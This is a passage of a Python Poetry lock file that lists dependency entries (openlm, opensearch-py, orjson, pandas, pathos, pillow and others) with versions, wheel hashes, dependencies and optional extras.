] [[package]] name = "openlm" version = "0.0.5" description = "Drop-in OpenAI-compatible that can call LLMs from other providers" optional = true python-versions = ">=3.8.1,<4.0" files = [ {file = "openlm-0.0.5-py3-none-any.whl", hash = "sha256:9fcbbc575d2869e2a6c0b00827f9be2189c067c2de4bf03ef3cbdf488367ae93"}, {file = "openlm-0.0.5.tar.gz", hash = "sha256:0eb3fd7a9e4f7b4248931ff2f0dc91c525d990b99956886861a1b3f9868bc451"}, ] [package.dependencies] requests = ">=2,<3" [[package]] name = "opensearch-py" version = "2.3.2" description = "Python client for OpenSearch" optional = true python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, <4" files = [ {file = "opensearch-py-2.3.2.tar.gz", hash = "sha256:96e470b55107fd5bfd873722dc9808c333360eacfa174341f5cc2d021aa30448"}, {file = "opensearch_py-2.3.2-py2.py3-none-any.whl", hash = "sha256:b1d6607380c8f19d90c142470939d051f0bac96069ce0ac25970b3c39c431f8b"}, ] [package.dependencies] certifi = ">=2022.12.07" python-dateutil = "*" requests = ">=2.4.0,<3.0.0" six = "*" urllib3 = ">=1.26.9" [package.extras] async = ["aiohttp (>=3,<4)"] develop = ["black", "botocore", "coverage (<7.0.0)", "jinja2", "mock", "myst-parser", "pytest (>=3.0.0)", "pytest-cov", "pytest-mock (<4.0.0)", "pytz", "pyyaml", "requests (>=2.0.0,<3.0.0)", "sphinx", "sphinx-copybutton", "sphinx-rtd-theme"] docs = ["myst-parser", "sphinx", "sphinx-copybutton", "sphinx-rtd-theme"] kerberos = ["requests-kerberos"] [[package]] name = "opt-einsum" version = "3.3.0" description = "Optimizing numpys einsum function" optional = true python-versions = ">=3.5" files = [ {file = "opt_einsum-3.3.0-py3-none-any.whl", hash = "sha256:2455e59e3947d3c275477df7f5205b30635e266fe6dc300e3d9f9646bfcea147"}, {file = "opt_einsum-3.3.0.tar.gz", hash = "sha256:59f6475f77bbc37dcf7cd748519c0ec60722e91e63ca114e68821c0c54a46549"}, ] [package.dependencies] numpy = ">=1.7" [package.extras] docs = ["numpydoc", "sphinx (==1.2.3)", "sphinx-rtd-theme", "sphinxcontrib-napoleon"] tests = ["pytest", "pytest-cov", "pytest-pep8"] [[package]] name = "orjson" version = "3.9.10" description = "Fast, correct Python JSON library supporting dataclasses, datetimes, and numpy" optional = true python-versions = ">=3.8" files = [ {file = "orjson-3.9.10-cp310-cp310-macosx_10_15_x86_64.macosx_11_0_arm64.macosx_10_15_universal2.whl", hash = "sha256:c18a4da2f50050a03d1da5317388ef84a16013302a5281d6f64e4a3f406aabc4"}, {file = "orjson-3.9.10-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:5148bab4d71f58948c7c39d12b14a9005b6ab35a0bdf317a8ade9a9e4d9d0bd5"}, {file = "orjson-3.9.10-cp310-cp310-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:4cf7837c3b11a2dfb589f8530b3cff2bd0307ace4c301e8997e95c7468c1378e"}, {file = "orjson-3.9.10-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:c62b6fa2961a1dcc51ebe88771be5319a93fd89bd247c9ddf732bc250507bc2b"}, {file = "orjson-3.9.10-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:deeb3922a7a804755bbe6b5be9b312e746137a03600f488290318936c1a2d4dc"}, {file = "orjson-3.9.10-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1234dc92d011d3554d929b6cf058ac4a24d188d97be5e04355f1b9223e98bbe9"}, {file = "orjson-3.9.10-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:06ad5543217e0e46fd7ab7ea45d506c76f878b87b1b4e369006bdb01acc05a83"}, {file = "orjson-3.9.10-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:4fd72fab7bddce46c6826994ce1e7de145ae1e9e106ebb8eb9ce1393ca01444d"}, {file = "orjson-3.9.10-cp310-none-win32.whl", hash = "sha256:b5b7d4a44cc0e6ff98da5d56cde794385bdd212a86563ac321ca64d7f80c80d1"}, {file = "orjson-3.9.10-cp310-none-win_amd64.whl", hash = "sha256:61804231099214e2f84998316f3238c4c2c4aaec302df12b21a64d72e2a135c7"}, {file = "orjson-3.9.10-cp311-cp311-macosx_10_15_x86_64.macosx_11_0_arm64.macosx_10_15_universal2.whl", hash = "sha256:cff7570d492bcf4b64cc862a6e2fb77edd5e5748ad715f487628f102815165e9"}, {file = "orjson-3.9.10-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:ed8bc367f725dfc5cabeed1ae079d00369900231fbb5a5280cf0736c30e2adf7"}, {file = "orjson-3.9.10-cp311-cp311-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:c812312847867b6335cfb264772f2a7e85b3b502d3a6b0586aa35e1858528ab1"}, {file = "orjson-3.9.10-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:9edd2856611e5050004f4722922b7b1cd6268da34102667bd49d2a2b18bafb81"}, {file = "orjson-3.9.10-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:674eb520f02422546c40401f4efaf8207b5e29e420c17051cddf6c02783ff5ca"}, {file = "orjson-3.9.10-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1d0dc4310da8b5f6415949bd5ef937e60aeb0eb6b16f95041b5e43e6200821fb"}, {file = "orjson-3.9.10-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:e99c625b8c95d7741fe057585176b1b8783d46ed4b8932cf98ee145c4facf499"}, {file = "orjson-3.9.10-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:ec6f18f96b47299c11203edfbdc34e1b69085070d9a3d1f302810cc23ad36bf3"}, {file = "orjson-3.9.10-cp311-none-win32.whl", hash = "sha256:ce0a29c28dfb8eccd0f16219360530bc3cfdf6bf70ca384dacd36e6c650ef8e8"}, {file = "orjson-3.9.10-cp311-none-win_amd64.whl", hash = "sha256:cf80b550092cc480a0cbd0750e8189247ff45457e5a023305f7ef1bcec811616"}, {file = "orjson-3.9.10-cp312-cp312-macosx_10_15_x86_64.macosx_11_0_arm64.macosx_10_15_universal2.whl", hash = "sha256:602a8001bdf60e1a7d544be29c82560a7b49319a0b31d62586548835bbe2c862"}, {file = "orjson-3.9.10-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f295efcd47b6124b01255d1491f9e46f17ef40d3d7eabf7364099e463fb45f0f"}, {file = "orjson-3.9.10-cp312-cp312-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:92af0d00091e744587221e79f68d617b432425a7e59328ca4c496f774a356071"}, {file = "orjson-3.9.10-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:c5a02360e73e7208a872bf65a7554c9f15df5fe063dc047f79738998b0506a14"}, {file = "orjson-3.9.10-cp312-cp312-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:858379cbb08d84fe7583231077d9a36a1a20eb72f8c9076a45df8b083724ad1d"}, {file = "orjson-3.9.10-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:666c6fdcaac1f13eb982b649e1c311c08d7097cbda24f32612dae43648d8db8d"}, {file = "orjson-3.9.10-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:3fb205ab52a2e30354640780ce4587157a9563a68c9beaf52153e1cea9aa0921"}, {file = "orjson-3.9.10-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:7ec960b1b942ee3c69323b8721df2a3ce28ff40e7ca47873ae35bfafeb4555ca"}, {file = "orjson-3.9.10-cp312-none-win_amd64.whl", hash = "sha256:3e892621434392199efb54e69edfff9f699f6cc36dd9553c5bf796058b14b20d"}, {file = "orjson-3.9.10-cp38-cp38-macosx_10_15_x86_64.macosx_11_0_arm64.macosx_10_15_universal2.whl", hash = "sha256:8b9ba0ccd5a7f4219e67fbbe25e6b4a46ceef783c42af7dbc1da548eb28b6531"}, {file = "orjson-3.9.10-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:2e2ecd1d349e62e3960695214f40939bbfdcaeaaa62ccc638f8e651cf0970e5f"}, {file = "orjson-3.9.10-cp38-cp38-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:7f433be3b3f4c66016d5a20e5b4444ef833a1f802ced13a2d852c637f69729c1"}, {file = "orjson-3.9.10-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:4689270c35d4bb3102e103ac43c3f0b76b169760aff8bcf2d401a3e0e58cdb7f"}, {file = "orjson-3.9.10-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:4bd176f528a8151a6efc5359b853ba3cc0e82d4cd1fab9c1300c5d957dc8f48c"}, {file = "orjson-3.9.10-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3a2ce5ea4f71681623f04e2b7dadede3c7435dfb5e5e2d1d0ec25b35530e277b"}, {file = "orjson-3.9.10-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:49f8ad582da6e8d2cf663c4ba5bf9f83cc052570a3a767487fec6af839b0e777"}, {file = "orjson-3.9.10-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:2a11b4b1a8415f105d989876a19b173f6cdc89ca13855ccc67c18efbd7cbd1f8"}, {file = "orjson-3.9.10-cp38-none-win32.whl", hash = "sha256:a353bf1f565ed27ba71a419b2cd3db9d6151da426b61b289b6ba1422a702e643"}, {file = "orjson-3.9.10-cp38-none-win_amd64.whl", hash = "sha256:e28a50b5be854e18d54f75ef1bb13e1abf4bc650ab9d635e4258c58e71eb6ad5"}, {file = "orjson-3.9.10-cp39-cp39-macosx_10_15_x86_64.macosx_11_0_arm64.macosx_10_15_universal2.whl", hash = "sha256:ee5926746232f627a3be1cc175b2cfad24d0170d520361f4ce3fa2fd83f09e1d"}, {file = "orjson-3.9.10-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:0a73160e823151f33cdc05fe2cea557c5ef12fdf276ce29bb4f1c571c8368a60"}, {file = "orjson-3.9.10-cp39-cp39-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:c338ed69ad0b8f8f8920c13f529889fe0771abbb46550013e3c3d01e5174deef"}, {file = "orjson-3.9.10-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:5869e8e130e99687d9e4be835116c4ebd83ca92e52e55810962446d841aba8de"}, {file = "orjson-3.9.10-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:d2c1e559d96a7f94a4f581e2a32d6d610df5840881a8cba8f25e446f4d792df3"}, {file = "orjson-3.9.10-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:81a3a3a72c9811b56adf8bcc829b010163bb2fc308877e50e9910c9357e78521"}, {file = "orjson-3.9.10-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:7f8fb7f5ecf4f6355683ac6881fd64b5bb2b8a60e3ccde6ff799e48791d8f864"}, {file = "orjson-3.9.10-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:c943b35ecdf7123b2d81d225397efddf0bce2e81db2f3ae633ead38e85cd5ade"}, {file = "orjson-3.9.10-cp39-none-win32.whl", hash = "sha256:fb0b361d73f6b8eeceba47cd37070b5e6c9de5beaeaa63a1cb35c7e1a73ef088"}, {file = "orjson-3.9.10-cp39-none-win_amd64.whl", hash = "sha256:b90f340cb6397ec7a854157fac03f0c82b744abdd1c0941a024c3c29d1340aff"}, {file = "orjson-3.9.10.tar.gz", hash = "sha256:9ebbdbd6a046c304b1845e96fbcc5559cd296b4dfd3ad2509e33c4d9ce07d6a1"}, ] [[package]] name = "overrides" version = "7.4.0" description = "A decorator to automatically detect mismatch when overriding a method." optional = false python-versions = ">=3.6" files = [ {file = "overrides-7.4.0-py3-none-any.whl", hash = "sha256:3ad24583f86d6d7a49049695efe9933e67ba62f0c7625d53c59fa832ce4b8b7d"}, {file = "overrides-7.4.0.tar.gz", hash = "sha256:9502a3cca51f4fac40b5feca985b6703a5c1f6ad815588a7ca9e285b9dca6757"}, ] [[package]] name = "packaging" version = "23.2" description = "Core utilities for Python packages" optional = false python-versions = ">=3.7" files = [ {file = "packaging-23.2-py3-none-any.whl", hash = "sha256:8c491190033a9af7e1d931d0b5dacc2ef47509b34dd0de67ed209b5203fc88c7"}, {file = "packaging-23.2.tar.gz", hash = "sha256:048fb0e9405036518eaaf48a55953c750c11e1a1b68e0dd1a9d62ed0c092cfc5"}, ] [[package]] name = "pandas" version = "2.0.3" description = "Powerful data structures for data analysis, time series, and statistics" optional = false python-versions = ">=3.8" files = [ {file = "pandas-2.0.3-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:e4c7c9f27a4185304c7caf96dc7d91bc60bc162221152de697c98eb0b2648dd8"}, {file = "pandas-2.0.3-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:f167beed68918d62bffb6ec64f2e1d8a7d297a038f86d4aed056b9493fca407f"}, {file = "pandas-2.0.3-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:ce0c6f76a0f1ba361551f3e6dceaff06bde7514a374aa43e33b588ec10420183"}, {file = "pandas-2.0.3-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ba619e410a21d8c387a1ea6e8a0e49bb42216474436245718d7f2e88a2f8d7c0"}, {file = "pandas-2.0.3-cp310-cp310-win32.whl", hash = "sha256:3ef285093b4fe5058eefd756100a367f27029913760773c8bf1d2d8bebe5d210"}, {file = "pandas-2.0.3-cp310-cp310-win_amd64.whl", hash = "sha256:9ee1a69328d5c36c98d8e74db06f4ad518a1840e8ccb94a4ba86920986bb617e"}, {file = "pandas-2.0.3-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:b084b91d8d66ab19f5bb3256cbd5ea661848338301940e17f4492b2ce0801fe8"}, {file = "pandas-2.0.3-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:37673e3bdf1551b95bf5d4ce372b37770f9529743d2498032439371fc7b7eb26"}, {file = "pandas-2.0.3-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b9cb1e14fdb546396b7e1b923ffaeeac24e4cedd14266c3497216dd4448e4f2d"}, {file = "pandas-2.0.3-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d9cd88488cceb7635aebb84809d087468eb33551097d600c6dad13602029c2df"}, {file = "pandas-2.0.3-cp311-cp311-win32.whl", hash = "sha256:694888a81198786f0e164ee3a581df7d505024fbb1f15202fc7db88a71d84ebd"}, {file = "pandas-2.0.3-cp311-cp311-win_amd64.whl", hash = "sha256:6a21ab5c89dcbd57f78d0ae16630b090eec626360085a4148693def5452d8a6b"}, {file = "pandas-2.0.3-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:9e4da0d45e7f34c069fe4d522359df7d23badf83abc1d1cef398895822d11061"}, {file = "pandas-2.0.3-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:32fca2ee1b0d93dd71d979726b12b61faa06aeb93cf77468776287f41ff8fdc5"}, {file = "pandas-2.0.3-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:258d3624b3ae734490e4d63c430256e716f488c4fcb7c8e9bde2d3aa46c29089"}, {file = "pandas-2.0.3-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9eae3dc34fa1aa7772dd3fc60270d13ced7346fcbcfee017d3132ec625e23bb0"}, {file = "pandas-2.0.3-cp38-cp38-win32.whl", hash = "sha256:f3421a7afb1a43f7e38e82e844e2bca9a6d793d66c1a7f9f0ff39a795bbc5e02"}, {file = "pandas-2.0.3-cp38-cp38-win_amd64.whl", hash = "sha256:69d7f3884c95da3a31ef82b7618af5710dba95bb885ffab339aad925c3e8ce78"}, {file = "pandas-2.0.3-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:5247fb1ba347c1261cbbf0fcfba4a3121fbb4029d95d9ef4dc45406620b25c8b"}, {file = "pandas-2.0.3-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:81af086f4543c9d8bb128328b5d32e9986e0c84d3ee673a2ac6fb57fd14f755e"}, {file = "pandas-2.0.3-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1994c789bf12a7c5098277fb43836ce090f1073858c10f9220998ac74f37c69b"}, {file = "pandas-2.0.3-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:5ec591c48e29226bcbb316e0c1e9423622bc7a4eaf1ef7c3c9fa1a3981f89641"}, {file = "pandas-2.0.3-cp39-cp39-win32.whl", hash = "sha256:04dbdbaf2e4d46ca8da896e1805bc04eb85caa9a82e259e8eed00254d5e0c682"}, {file = "pandas-2.0.3-cp39-cp39-win_amd64.whl", hash = "sha256:1168574b036cd8b93abc746171c9b4f1b83467438a5e45909fed645cf8692dbc"}, {file = "pandas-2.0.3.tar.gz", hash = "sha256:c02f372a88e0d17f36d3093a644c73cfc1788e876a7c4bcb4020a77512e2043c"}, ] [package.dependencies] numpy = [ {version = ">=1.23.2", markers = "python_version >= \"3.11\""}, {version = ">=1.20.3", markers = "python_version < \"3.10\""}, {version = ">=1.21.0", markers = "python_version >= \"3.10\" and python_version < \"3.11\""}, ] python-dateutil = ">=2.8.2" pytz = ">=2020.1" tzdata = ">=2022.1" [package.extras] all = ["PyQt5 (>=5.15.1)", "SQLAlchemy (>=1.4.16)", "beautifulsoup4 (>=4.9.3)", "bottleneck (>=1.3.2)", "brotlipy (>=0.7.0)", "fastparquet (>=0.6.3)", "fsspec (>=2021.07.0)", "gcsfs (>=2021.07.0)", "html5lib (>=1.1)", "hypothesis (>=6.34.2)", "jinja2 (>=3.0.0)", "lxml (>=4.6.3)", "matplotlib (>=3.6.1)", "numba (>=0.53.1)", "numexpr (>=2.7.3)", "odfpy (>=1.4.1)", "openpyxl (>=3.0.7)", "pandas-gbq (>=0.15.0)", "psycopg2 (>=2.8.6)", "pyarrow (>=7.0.0)", "pymysql (>=1.0.2)", "pyreadstat (>=1.1.2)", "pytest (>=7.3.2)", "pytest-asyncio (>=0.17.0)", "pytest-xdist (>=2.2.0)", "python-snappy (>=0.6.0)", "pyxlsb (>=1.0.8)", "qtpy (>=2.2.0)", "s3fs (>=2021.08.0)", "scipy (>=1.7.1)", "tables (>=3.6.1)", "tabulate (>=0.8.9)", "xarray (>=0.21.0)", "xlrd (>=2.0.1)", "xlsxwriter (>=1.4.3)", "zstandard (>=0.15.2)"] aws = ["s3fs (>=2021.08.0)"] clipboard = ["PyQt5 (>=5.15.1)", "qtpy (>=2.2.0)"] compression = ["brotlipy (>=0.7.0)", "python-snappy (>=0.6.0)", "zstandard (>=0.15.2)"] computation = ["scipy (>=1.7.1)", "xarray (>=0.21.0)"] excel = ["odfpy (>=1.4.1)", "openpyxl (>=3.0.7)", "pyxlsb (>=1.0.8)", "xlrd (>=2.0.1)", "xlsxwriter (>=1.4.3)"] feather = ["pyarrow (>=7.0.0)"] fss = ["fsspec (>=2021.07.0)"] gcp = ["gcsfs (>=2021.07.0)", "pandas-gbq (>=0.15.0)"] hdf5 = ["tables (>=3.6.1)"] html = ["beautifulsoup4 (>=4.9.3)", "html5lib (>=1.1)", "lxml (>=4.6.3)"] mysql = ["SQLAlchemy (>=1.4.16)", "pymysql (>=1.0.2)"] output-formatting = ["jinja2 (>=3.0.0)", "tabulate (>=0.8.9)"] parquet = ["pyarrow (>=7.0.0)"] performance = ["bottleneck (>=1.3.2)", "numba (>=0.53.1)", "numexpr (>=2.7.1)"] plot = ["matplotlib (>=3.6.1)"] postgresql = ["SQLAlchemy (>=1.4.16)", "psycopg2 (>=2.8.6)"] spss = ["pyreadstat (>=1.1.2)"] sql-other = ["SQLAlchemy (>=1.4.16)"] test = ["hypothesis (>=6.34.2)", "pytest (>=7.3.2)", "pytest-asyncio (>=0.17.0)", "pytest-xdist (>=2.2.0)"] xml = ["lxml (>=4.6.3)"] [[package]] name = "pandocfilters" version = "1.5.0" description = "Utilities for writing pandoc filters in python" optional = false python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*" files = [ {file = "pandocfilters-1.5.0-py2.py3-none-any.whl", hash = "sha256:33aae3f25fd1a026079f5d27bdd52496f0e0803b3469282162bafdcbdf6ef14f"}, {file = "pandocfilters-1.5.0.tar.gz", hash = "sha256:0b679503337d233b4339a817bfc8c50064e2eff681314376a47cb582305a7a38"}, ] [[package]] name = "para" version = "0.0.8" description = "a set utilities that ake advantage of python's 'multiprocessing' module to distribute CPU-intensive tasks" optional = true python-versions = "*" files = [ {file = "para-0.0.8-py3-none-any.whl", hash = "sha256:c63b030658cafd84f8fabfc000142324d51c7440e50ef5012fd1a54972ca25f4"}, {file = "para-0.0.8.tar.gz", hash = "sha256:46c3232ae9d8ea9d886cfd08cdd112892202bed8645f40b6255597ba4cfef217"}, ] [[package]] name = "parso" version = "0.8.3" description = "A Python Parser" optional = false python-versions = ">=3.6" files = [ {file = "parso-0.8.3-py2.py3-none-any.whl", hash = "sha256:c001d4636cd3aecdaf33cbb40aebb59b094be2a74c556778ef5576c175e19e75"}, {file = "parso-0.8.3.tar.gz", hash = "sha256:8c07be290bb59f03588915921e29e8a50002acaf2cdc5fa0e0114f91709fafa0"}, ] [package.extras] qa = ["flake8 (==3.8.3)", "mypy (==0.782)"] testing = ["docopt", "pytest (<6.0.0)"] [[package]] name = "pathos" version = "0.3.1" description = "parallel graph management and execution in heterogeneous computing" optional = true python-versions = ">=3.7" files = [ {file = "pathos-0.3.1-py3-none-any.whl", hash = "sha256:b1c7145e2adcc19c7e9cac48f110ea5a63e300c1cc10c2947d4857dc97a47b46"}, {file = "pathos-0.3.1.tar.gz", hash = "sha256:c9a088021493c5cb627d4459bba6c0533c684199e271a5dc297d62be23d74019"}, ] [package.dependencies] dill = ">=0.3.7" multiprocess = ">=0.70.15" pox = ">=0.3.3" ppft = ">=1.7.6.7" [[package]] name = "pathspec" version = "0.11.2" description = "Utility library for gitignore style pattern matching of file paths." optional = false python-versions = ">=3.7" files = [ {file = "pathspec-0.11.2-py3-none-any.whl", hash = "sha256:1d6ed233af05e679efb96b1851550ea95bbb64b7c490b0f5aa52996c11e92a20"}, {file = "pathspec-0.11.2.tar.gz", hash = "sha256:e0d8d0ac2f12da61956eb2306b69f9469b42f4deb0f3cb6ed47b9cce9996ced3"}, ] [[package]] name = "pdfminer-six" version = "20221105" description = "PDF parser and analyzer" optional = true python-versions = ">=3.6" files = [ {file = "pdfminer.six-20221105-py3-none-any.whl", hash = "sha256:1eaddd712d5b2732f8ac8486824533514f8ba12a0787b3d5fe1e686cd826532d"}, {file = "pdfminer.six-20221105.tar.gz", hash = "sha256:8448ab7b939d18b64820478ecac5394f482d7a79f5f7eaa7703c6c959c175e1d"}, ] [package.dependencies] charset-normalizer = ">=2.0.0" cryptography = ">=36.0.0" [package.extras] dev = ["black", "mypy (==0.931)", "nox", "pytest"] docs = ["sphinx", "sphinx-argparse"] image = ["Pillow"] [[package]] name = "pexpect" version = "4.8.0" description = "Pexpect allows easy control of interactive console applications." optional = false python-versions = "*" files = [ {file = "pexpect-4.8.0-py2.py3-none-any.whl", hash = "sha256:0b48a55dcb3c05f3329815901ea4fc1537514d6ba867a152b581d69ae3710937"}, {file = "pexpect-4.8.0.tar.gz", hash = "sha256:fc65a43959d153d0114afe13997d439c22823a27cefceb5ff35c2178c6784c0c"}, ] [package.dependencies] ptyprocess = ">=0.5" [[package]] name = "pgvector" version = "0.1.8" description = "pgvector support for Python" optional = true python-versions = ">=3.6" files = [ {file = "pgvector-0.1.8-py2.py3-none-any.whl", hash = "sha256:99dce3a6580ef73863edb9b8441937671f4e1a09383826e6b0838176cd441a96"}, ] [package.dependencies] numpy = "*" [[package]] name = "pickleshare" version = "0.7.5" description = "Tiny 'shelve'-like database with concurrency support" optional = false python-versions = "*" files = [ {file = "pickleshare-0.7.5-py2.py3-none-any.whl", hash = "sha256:9649af414d74d4df115d5d718f82acb59c9d418196b7b4290ed47a12ce62df56"}, {file = "pickleshare-0.7.5.tar.gz", hash = "sha256:87683d47965c1da65cdacaf31c8441d12b8044cdec9aca500cd78fc2c683afca"}, ] [[package]] name = "pillow" version = "10.1.0" description = "Python Imaging Library (Fork)" optional = true python-versions = ">=3.8" files = [ {file = "Pillow-10.1.0-cp310-cp310-macosx_10_10_x86_64.whl", hash = "sha256:1ab05f3db77e98f93964697c8efc49c7954b08dd61cff526b7f2531a22410106"}, {file = "Pillow-10.1.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:6932a7652464746fcb484f7fc3618e6503d2066d853f68a4bd97193a3996e273"}, {file = "Pillow-10.1.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a5f63b5a68daedc54c7c3464508d8c12075e56dcfbd42f8c1bf40169061ae666"}, {file = "Pillow-10.1.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c0949b55eb607898e28eaccb525ab104b2d86542a85c74baf3a6dc24002edec2"}, {file = "Pillow-10.1.0-cp310-cp310-manylinux_2_28_aarch64.whl", hash = "sha256:ae88931f93214777c7a3aa0a8f92a683f83ecde27f65a45f95f22d289a69e593"}, {file = "Pillow-10.1.0-cp310-cp310-manylinux_2_28_x86_64.whl", hash = "sha256:b0eb01ca85b2361b09480784a7931fc648ed8b7836f01fb9241141b968feb1db"}, {file = "Pillow-10.1.0-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:d27b5997bdd2eb9fb199982bb7eb6164db0426904020dc38c10203187ae2ff2f"}, {file = "Pillow-10.1.0-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:7df5608bc38bd37ef585ae9c38c9cd46d7c81498f086915b0f97255ea60c2818"}, {file = "Pillow-10.1.0-cp310-cp310-win_amd64.whl", hash = "sha256:41f67248d92a5e0a2076d3517d8d4b1e41a97e2df10eb8f93106c89107f38b57"}, {file = "Pillow-10.1.0-cp311-cp311-macosx_10_10_x86_64.whl", hash = "sha256:1fb29c07478e6c06a46b867e43b0bcdb241b44cc52be9bc25ce5944eed4648e7"}, {file = "Pillow-10.1.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:2cdc65a46e74514ce742c2013cd4a2d12e8553e3a2563c64879f7c7e4d28bce7"}, {file = "Pillow-10.1.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:50d08cd0a2ecd2a8657bd3d82c71efd5a58edb04d9308185d66c3a5a5bed9610"}, {file = "Pillow-10.1.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:062a1610e3bc258bff2328ec43f34244fcec972ee0717200cb1425214fe5b839"}, {file = "Pillow-10.1.0-cp311-cp311-manylinux_2_28_aarch64.whl", hash = "sha256:61f1a9d247317fa08a308daaa8ee7b3f760ab1809ca2da14ecc88ae4257d6172"}, {file = "Pillow-10.1.0-cp311-cp311-manylinux_2_28_x86_64.whl", hash = "sha256:a646e48de237d860c36e0db37ecaecaa3619e6f3e9d5319e527ccbc8151df061"}, {file = "Pillow-10.1.0-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:47e5bf85b80abc03be7455c95b6d6e4896a62f6541c1f2ce77a7d2bb832af262"}, {file = "Pillow-10.1.0-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:a92386125e9ee90381c3369f57a2a50fa9e6aa8b1cf1d9c4b200d41a7dd8e992"}, {file = "Pillow-10.1.0-cp311-cp311-win_amd64.whl", hash = "sha256:0f7c276c05a9767e877a0b4c5050c8bee6a6d960d7f0c11ebda6b99746068c2a"}, {file = "Pillow-10.1.0-cp312-cp312-macosx_10_10_x86_64.whl", hash = "sha256:a89b8312d51715b510a4fe9fc13686283f376cfd5abca8cd1c65e4c76e21081b"}, {file = "Pillow-10.1.0-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:00f438bb841382b15d7deb9a05cc946ee0f2c352653c7aa659e75e592f6fa17d"}, {file = "Pillow-10.1.0-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3d929a19f5469b3f4df33a3df2983db070ebb2088a1e145e18facbc28cae5b27"}, {file = "Pillow-10.1.0-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9a92109192b360634a4489c0c756364c0c3a2992906752165ecb50544c251312"}, {file = "Pillow-10.1.0-cp312-cp312-manylinux_2_28_aarch64.whl", hash = "sha256:0248f86b3ea061e67817c47ecbe82c23f9dd5d5226200eb9090b3873d3ca32de"}, {file = "Pillow-10.1.0-cp312-cp312-manylinux_2_28_x86_64.whl", hash = "sha256:9882a7451c680c12f232a422730f986a1fcd808da0fd428f08b671237237d651"}, {file = "Pillow-10.1.0-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:1c3ac5423c8c1da5928aa12c6e258921956757d976405e9467c5f39d1d577a4b"}, {file = "Pillow-10.1.0-cp312-cp312-musllinux_1_1_x86_64.whl", hash = 